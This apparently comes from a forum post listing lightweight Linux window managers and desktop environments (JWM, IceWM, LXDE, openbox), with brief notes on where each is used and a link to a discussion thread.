    • JWM (used as default for DamnSmallLinux, Puppy and Slitaz)
    • IceWM (lightweight, used in the older eeePCs I think)
    • LXDE
    • openbox (you can replace the GNOME default WM (metacity) with it); also works standalone.

    For more check Arch Wiki List.

    Discuss http://www.totse.info/bbs/showthread.php?t=5603